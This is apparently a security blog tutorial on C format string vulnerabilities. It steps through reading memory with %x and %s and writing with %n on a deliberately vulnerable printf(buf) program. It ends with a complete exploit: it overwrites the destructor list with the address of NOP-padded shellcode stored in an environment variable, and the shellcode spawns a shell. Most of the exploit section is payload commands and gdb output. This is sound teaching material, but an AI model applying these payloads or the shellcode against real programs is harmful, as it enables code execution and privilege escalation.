In many programming languages, the preferred way to deal with printing strings is through the use of format strings. Format strings allow for the parsing of strings containing an arbitrary number of mixed data type parameters. However, due to implementation details in certain languages such as C and C++, certain uses of functions which rely on format strings may make programs vulnerable to exploits. This type of vulnerability can lead to exploitation which reads arbitrary memory locations, or even writes to arbitrary memory locations (such as the return address). As such, format string vulnerabilities are an important security concern and should be something which all programmers watch out for.
To better understand format strings, let’s take a look at a sample program that makes use format strings. The program we’re going to look at is simple: It has one, 512 byte character array called buf and upon running uses strncpy to copy the first 511 bytes from argv[1] into the buf array. After strncpy has finished, printf is called on buf, and finally the program returns 0. Here’s the code:
#include <stdio.h>
#include <string.h>int main(int argc, char **argv) {
char buf[512];
strncpy(buf, argv[1], sizeof(buf) – 1);printf(buf);
return 0;
}
Looking at the code, it should be clear that printf is the function which makes use of format strings. In this use, printf(buf), buf is treated as a format string. Format strings are evaluated with a special format function. This function parses the string passed to it, and replaces certain control characters with variables from the stack. For example, if one wanted to print the value of the integer variable i, they might use the following:
printf(“Value of integer i: %d”, i);
Format string control characters are actually sets of characters, but they all start with a %. Since the format function needs to be able to parse format strings with any number of control characters, it simply assumes each control character belongs to a parameter which was passed via the stack. While this assumption holds true in examples such as the integer printing example above, it doesn’t always hold in situations such as that in our program using printf(buf). Our printf(buf) example will work fine, and the string contents of buf will be printed to the screen, under one condition. This condition is that the string buf does not contain anything which might be interpreted as a control character. If buf does contain control characters, the format function will treat them as valid control characters and perform the corresponding action such as reading an integer from the stack. This ends up being a security vulnerability in that format strings allow for both reading and writing data, and if the stack hasn’t been initialized in the manner expected given the format string/control characters, then the data read/written can end up being arbitrary and end up causing unintended results.
To see an example of this vulnerability, let’s attempt to run our program and cause it to print the hex values held at the start of our string. To do this, let’s first look at the stack. Prior to printf being called, the “top” of the stack looks roughly like this:
[buf][argv][argc][spf][ra]
From here the printf function will be called, which will add to the top of the stack, thus we’ll have to to pop off a bit of data before we can get to our string. To pop values off the stack, we can use the %x control character. This control reads a 32 bit unsigned hex value from the stack. So, let’s make a few attemps at running the program with the format control characters to read a hex value from the stack:
s9ghost@localhost:/tmp/.fsv$ ./test AAAABBBB.%x.%x.%x.%x.%x.%x.%x.%x
AAAABBBB.bfffde8d.1ff.10.7.bfffdae8.b29ce5.41414141.42424242
What is all this? Well, like we said, we’d have to use a few extra reads to move through some extra data on the stack from the call to printf. However, upon the 7th and 8th reads, we found hex values which correspond to the AAAABBBB sequence at the start of our string. A deeper reason to why we’re able to read the value there is that the control character %x expects a 32 bit int, which would be placed by value onto the stack. Other control characters, such as %s which gets a null terminated string, perform slightly differently. Since strings aren’t passed by value but instead by reference, the value on the stack is a pointer to a string. Thus, if we use the control character %s, the value on the stack will be used as a pointer, and that location is where a string will be read from. This results in another way to read from memory, and in fact let’s us read strings from any arbitrary memory location if we can control what is next on the stack.
Well, since in the above example we were able to use %x to move to the start of our format string, let’s try writing a valid memory location at the start of our string and use the %s control character to de-reference that location and print the string stored there. First, though, we need a memory location that’ll work. For this exercise let’s assume we have the following string at 0xbfffdeb0: “TERM=xterm”. Next, we can write the address in little-endian due to our architecture.
s9ghost@localhost:/tmp/.fsv$ ./test `perl -e ‘print “\xb0\xde\xff\xbf”,”AAAABBBB.%x.%x.%x.%x.%x.%x.%s”‘`
°Þÿ¿AAAABBBB.bfffde8c.1ff.10.7.bfffdae8.2c0ce5.RM=xterm
Now you can see that with that use of %x to move our provided string to the front of the stack, and having an address at the front of our string, and using a control character which de-references, we can read from any arbitrary memory location. However, format strings contain even more control characters than the ones we’ve seen here. Specifically, the %n control allows writing to a variable, and it is through this which format string vulnerabilities can also result in writing to arbitrary memory locations.
The %n control character is used to store the number of characters written so far into a variable. Like all control characters, it uses a value from the stack, however since it stores an int into a variable, it expects the address of this variable to be on the stack. Thus, since we know we can supply values to the stack, if we can also control how many characters we’ve read, we might be able to overwrite an important area of memory. The careful thinker may have picked up on something at this point: If we need to write more to increase the value we’ll store with %n, won’t that move us past our stack location if we need to use more %x or any other read control? While this is true, writing and reading aren’t the same. Specifically, the %x control allows for formatting options, such as padding, which will write characters regardless of what was read. To pad a number, we simply tell %x how many characters we want the result to be. For an example, let’s look at this modified use of the %x control character.
s9ghost@localhost:/tmp/.fsv$ ./test `perl -e ‘print “\xb0\xde\xff\xbf”,”AAAABBBB.%x.%x.%05x.%05x.%x.”‘`
°Þÿ¿AAAABBBB.bfffde8d.1ff.00010.00007.bfffdae8.
Looking at the 3rd and 4th %x, we can see the addition of 05. The leading 0 designates that the value printed will be zero-padded, and the 5 specifies that at least 5 characters will be printed. This result is seen in the “00010” and “00007” that was printed instead of simply “10” or “7” as we saw in the previous example without the padding options. Thus, it is through this zero-padding that we can increase the number of bytes printed without using additional control characters and altering the stack. Now let’s attempt to re-write some memory. Let’s assume we’ve found the following memory location containing the following string:
(gdb) x/1s 0xbfffdedf
0xbfffdedf: “example=aaaa”
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61
To write to memory, our format string starts out similar to reading, in fact lets read just to make sure we’re positioned correctly on the stack:
s9ghost@localhost:/tmp/.fsv$ ./test `perl -e ‘print “\xd1\xde\xff\xbf”,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%s”‘`
ßÞÿ¿AAAABBBB.bfffde7b.1ff.00010.00007.bfffdac8.51ece5.example=aaaa
So far, so good. Now if we use the %n control character instead of %s, we should be able to write to the address on the stack, instead of reading to it. Let’s go a head and do that using gdb so that we can place a couple breakpoints before and after printf to pause the program and check the values in memory to verify our results:
(gdb) run `perl -e ‘print “\xd9\xde\xff\xbf”,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n”‘`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61
(gdb) cont
Continuing.Breakpoint 2, 0x08048437 in main ()
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x36 0x00 0x00 0x00
(gdb) cont
Continuing.ÙÞÿ¿AAAABBBB.bfffde6d.1ff.00010.00007.bfffdaa8.ec5ce5.
Program exited normally.
At this point we’ve proven that we can write to any specific memory address. We also know we can pad some of our reads and change the value which we can write to memory. However, how well would this work if we wanted to write say, a memory address of some shellcode to an arbitrary memory location (like the return address or some other executable place)? Well, if we wanted to write a memory location, for example 0xbfffa00a, this would mean padding on the size of within anywhere from a few hundred million to a few billion. This is far too large to effectively pad. However, what we can do is chain four small writes of one byte at a time together in a row in an attempt to overwrite an address.
To chain together writes, we’re going to have to place four memory locations onto the stack via our format string. We must also, obviously, supply additional %n control characters. Let’s check out an example:
(gdb) run `perl -e ‘print “\xd9\xde\xff\xbf”, “\xda\xde\xff\xbf”, “\xdb\xde\xff\xbf”, “\xdc\xde\xff\xbf”, “AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%n.%n.%n”‘`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/16xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61 0x00 0x53 0x53 0x48
(gdb) cont
Continuing.Breakpoint 2, 0x08048437 in main ()
(gdb) x/16xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x42 0x43 0x44 0x45 0x00 0x00 0x00 0x48
Now we’ve seen that we can control a full 32 bits of memory. The theory and details of format string vulnerabilities have been verified. However, to show the severity of format string vulnerabilities, let’s see if we can cause arbitrary code execution.
To cause code execution, we’re going to have to overwrite some area of memory with the address of the code we want executed. While we could potentially try to write to the return address on the stack frame, another option would be to take advantage of how C handles constructors and destructors. All C programs, whether they have valid constructors or destructors defined or not, have portions of code defined as constructor and destructor lists. If a program doesn’t specify it’s own, these lists will remain empty. The destructor list, for example, works by holding pointers to valid destructor functions. Thus, if we want to cause code execution we can do it by appending the address of the code we want to execute to the end of the destructor list and it will be run when the destructor is called. To write to the end of the destructor list, we’re going to need to know where it is. Luckily we can check this with the nm command as follows:
s9ghost@localhost:/tmp/.fsv$ nm ./test | grep DTOR
08049510 D __DTOR_END__
0804950c d __DTOR_LIST__
Since we need to write to the end of the list, we need to write to memory location 0x08049510. Let’s use that address as a base, and see if we can construct a format string which will overwrite it, similar to what we did above. Then let’s hit break points and examine the memory location to make sure it worked.
(gdb) run `perl -e ‘print “\x10\x95\x04\x08”, “\x11\x95\x04\x08”, “\x12\x95\x04\x08”, “\x13\x95\x04\x08”, “AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%n.%n.%n”‘`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x42 0x43 0x44 0x45 0x00 0x00 0x00 0x00
Now that we’ve got our format string overwriting the DTOR, the final thing we need to do is determine how to make our string write the values we need in order to represent the address of our arbitrary code. However, before doing that, we need to place some code into memory. Let’s use some linux shellcode we got from packetstorm which will spawn a shell. Let’s also pad it with many no-ops at the beginning so we can be a little more lenient about which memory address we choose. (This is just for ease, it’s not necessary and probably not a good idea in actual environments and NOP-padding may trigger an IDS.) To place our shellcode in memory, we can assign it to an environmental variable, we’ll use the variable SHELLCODE.
s9ghost@localhost:/tmp/.fsv$ export SHELLCODE=`perl -e ‘print “\x90″x5000,”\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘`
Now that our shellcode in placed in memory, let’s write a a small C program to get the address of our environmental variable holding our shellcode. This program and it’s use are shown next:
#include <stdio.h>
#include <stdlib.h>int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf(“%#x\n”, getenv(argv[1]));
return 0;
}s9ghost@localhost:/tmp/.fsv$ ./getmem SHELLCODE
bfffcaf8
Now we have our code in memory, and we know where in memory. So if we can jump to any memory location in the NOP padding of our shellcode, which is located at the first 5000 bytes starting at 0xbfffcaf8, we should be execute our shellcode.
Finally, let’s determine how much padding we need to write between uses of %n to correctly overwrite DTOR with our shellcode memory location. Remember that address are in memory in little-endian format and thus start with the lower bits furthest to the left. First, let’s re-write our format string adding %x controls between our %n’s so we can change the value written by each. We should also see what value is written by each %n and how much we need to alter their padding to get the results we want:
(gdb) run `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%08x.%n.%08x.%n.%08x.%n”‘`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0x58 0x62 0x6c 0x00 0x00 0x00 0x00
DTOR was correctly overwritten. Let’s look at the values. Well, since we have a large memory range of NOPs to jump to, we can leave the first 0x4e value alone as it’s the least significant byte. However based on the memory address we want to jump to, it looks like we’re going to have to change the second byte. Since we want to jump to somewhere in the range of 5000 bytes higher than 0xbfffcaf8, let’s just try for 0xcb in the second byte of DTOR. To do this, we’re going to have to pad the difference between the already assigned value, 0x58, and the value we want, 0xcb. Doing some math we see that 0xcb – 0x58 = 0x73, which is 115 decimal. Also, since we had 08 padding before, let’s add 8 more for a final value of 123 padding. Let’s attempt this and check the value written again to make sure it works:
(gdb) run `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%08x.%n.%08x.%n”‘`
The program being debugged has been started already.
Start it from the beginning? (y or n) yStarting program: /tmp/.fsv/test `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%08x.%n.%08x.%n”‘`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xd5 0xdf 0x00 0x00 0x00 0x00
As you can see, it’s working. We’ve now written 0xcb to the second byte of DTOR. Next, we want to write 0xff to the third byte. Let’s take the same approach as before. With the math, 0xff – 0xd5 = 0x2a, which is 42 decimal, and again add 8 for what we already padded for a final padding of 50. Let’s test it again:
(gdb) run `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%08x.%n”‘`
The program being debugged has been started already.
Start it from the beginning? (y or n) yStarting program: /tmp/.fsv/test `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%08x.%n”‘`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xff 0x09 0x01 0x00 0x00 0x00
Alright, one more byte to go. As you can see, the byte value changes as what we’ve done changes. The most recent value for the 4th byte is now 0x09. Let’s do our math again, 0xbf – 0x09 = 0xb6, which is 182 decimal, adding 8 more for previous padding gives 190 total padding. Let’s put this in, check our values, and see what happens when the program finishes:
(gdb) run `perl -e ‘print “\x10\x95\x04\x08″,”abcd”,”\x11\x95\x04\x08″,”abcd”,”\x12\x95\x04\x08″,”abcd”,”\x13\x95\x04\x08″,”AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%0190x.%n”‘`
Breakpoint 1, 0x080483f7 in main ()
(gdb) x/4xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.Breakpoint 2, 0x08048437 in main ()
(gdb) x/4xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xff 0xbf
(gdb) cont
Continuing. abcabcabcAAAABBBB.bfffca89.1ff.00010.00007.bfffc6c8.5d9ce5..000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064636261..00000000000000000000000000000000000000000064636261..0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064636261.
sh-4.1$
There we have it, a format string exploited to provide a shell.
Over the years, the format string landscape has changed. Many compilers now offer options to provide security against certain format string attacks, such as DTOR. However, other ways of exploiting format string vulnerabilities exist and continue to be developed. We will talk about other format string exploit options, such as writing to PLT/GOT or a stack Return Address, in future postings. Being able to read and write indiscriminately to and from memory is a major security flaw, and it is through this flaw that format string vulnerabilities make their mark on the computer security landscape.